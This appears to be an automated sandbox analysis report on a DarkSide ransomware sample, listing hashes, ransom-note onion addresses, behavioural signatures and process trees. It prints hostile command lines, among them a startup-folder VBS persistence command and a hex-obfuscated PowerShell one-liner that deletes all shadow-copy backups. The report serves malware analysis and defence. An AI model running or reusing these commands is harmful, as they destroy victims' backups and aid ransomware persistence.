Analysis
-
max time kernel
149s -
max time network
115s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system -
submitted
20/12/2023, 14:49
Static task
static1
Behavioral task
behavioral1
Sample
cd2fb1d044d414dcbf32bf67f2563208.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
cd2fb1d044d414dcbf32bf67f2563208.exe
Resource
win10v2004-20231215-en
General
-
Target
cd2fb1d044d414dcbf32bf67f2563208.exe
-
Size
2.3MB
-
MD5
cd2fb1d044d414dcbf32bf67f2563208
-
SHA1
98dae9d51bc1ee7d619a546550adc2e98113db17
-
SHA256
f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589
-
SHA512
88a89c729f4edf3cb944de03bed2177cb9b2791de261bbdb15ebeceb075311ba9318abedfa8380a194062b048496f43c9a5bbfdf712f96a69aa4b5d80c1adbde
-
SSDEEP
49152:kloF0g3n0xTxvO0REE0zVeWbKr9P95upyQQoQxlyxBf9NGFzdCh:kloeO0e35NKpPrqyLo4ah9+Mh
Malware Config
Extracted
C:\Users\Admin\README.398da5ec.TXT
darkside
http://darksidedxcftmqa.onion/homehardware/K4fLrrmO5GOIBHbhfJyN5rG4pkPcRlnc48ceUHtNgjONruPRTVc4Usyb96BuHkKa
http://darksidfqzcuhtk2.onion/FJ6BL608YXVN8DGFDP23JVF2RU0K0IC102LSJA09Z2JF14A1SCCJBOVPLRHSLU16
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (155) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops startup file 1 IoCs
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs (Process: cmd.exe)
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 1 IoCs
PID 952 set thread context of 2936 (Process: cd2fb1d044d414dcbf32bf67f2563208.exe, target procid: 30)
-
Modifies registry class 5 IoCs
Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.398da5ec (Process: cmd.exe)
Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.398da5ec\ = "398da5ec" (Process: cmd.exe)
Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec\DefaultIcon (Process: cmd.exe)
Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec (Process: cmd.exe)
Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\398da5ec.ico" (Process: cmd.exe)
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid / Process (25 entries):
952 cd2fb1d044d414dcbf32bf67f2563208.exe (1 entry)
2936 cd2fb1d044d414dcbf32bf67f2563208.exe (21 entries)
2808 powershell.exe (1 entry)
2664 cmd.exe (2 entries)
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
Token / pid / Process (24 entries):
cmd.exe (PID 2664): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
powershell.exe (PID 2808): SeDebugPrivilege
vssvc.exe (PID 2556): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
-
Suspicious use of SetWindowsHookEx 2 IoCs
pid / Process (2 entries):
952 cd2fb1d044d414dcbf32bf67f2563208.exe (2 entries)
-
Suspicious use of WriteProcessMemory 45 IoCs
description / pid / Process / procid_target (45 entries):
PID 952 wrote to memory of 1896 (Process: cd2fb1d044d414dcbf32bf67f2563208.exe, target procid: 28) (4 entries)
PID 952 wrote to memory of 2936 (Process: cd2fb1d044d414dcbf32bf67f2563208.exe, target procid: 30) (22 entries)
PID 2936 wrote to memory of 2664 (Process: cd2fb1d044d414dcbf32bf67f2563208.exe, target procid: 37) (15 entries)
PID 2664 wrote to memory of 2808 (Process: cmd.exe, target procid: 33) (4 entries)
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe"
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:952 -
[depth 2] C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
- Drops startup file
PID:1896
-
-
[depth 2] C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe
Command line: C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2936 -
[depth 3] C:\Windows\SysWOW64\cmd.exe
Command line: C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664
-
-
-
[depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
[depth 1] C:\Windows\system32\vssvc.exe
Command line: C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
[depth 1] C:\Windows\system32\wbem\WMIADAP.EXE
Command line: wmiadap.exe /D /T
PID:3936
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 951fbf2cb7c24736811bc60cd721e87a
SHA1: 4f8a81e1ba315801435eac03d24bab34a3f98324
SHA256: 7a05674267fdfa82e3f610f8d3ba8d8c2793899547a9e8d4f6c683be1b80c2f6
SHA512: 320b63d736ebbc976c5b76fd7d96073be97c08084ca67c00c11caf5dd297daf20b4431fb7e25267d0e6e2faf15ef1a6af4160a3a0eec218e204fb1227a90d0c0
-
Filesize: 133B
MD5: 458d6a199affafd2e9be5198c5ab8d6b
SHA1: ca8f469292204a3c10f0bc4dd25c4f3f77e09e1d
SHA256: bdcd987973f6215c09b1f22452e93459c9d8b0b8646927c85b96f6ecafd120b7
SHA512: 9e667d11143f8ac3db1eece5d67348ff34e2384b994e4601f3ba93c4001e5bc6156541b6535218ef0c7f1b64af3f14d15add881240ec45e09ce7734f74ef5bb2
-
Filesize: 2KB
MD5: 8f3af937b073ccc1eb6e0693c3922e1e
SHA1: 5a74d49a712238cfd8989fddf0aff1828bee6be6
SHA256: 2a301030357315a94c20d0ce0d9b12848d9c451a9836dbc8e4d5674444291975
SHA512: 2c628ec9774aeff244985217079bbdb72b6af7c123f0caace5e14a7f89286ccf16bb29ae022b015a3e52158cc26b080d2a74627aaf843f466cc1328c85a0fabc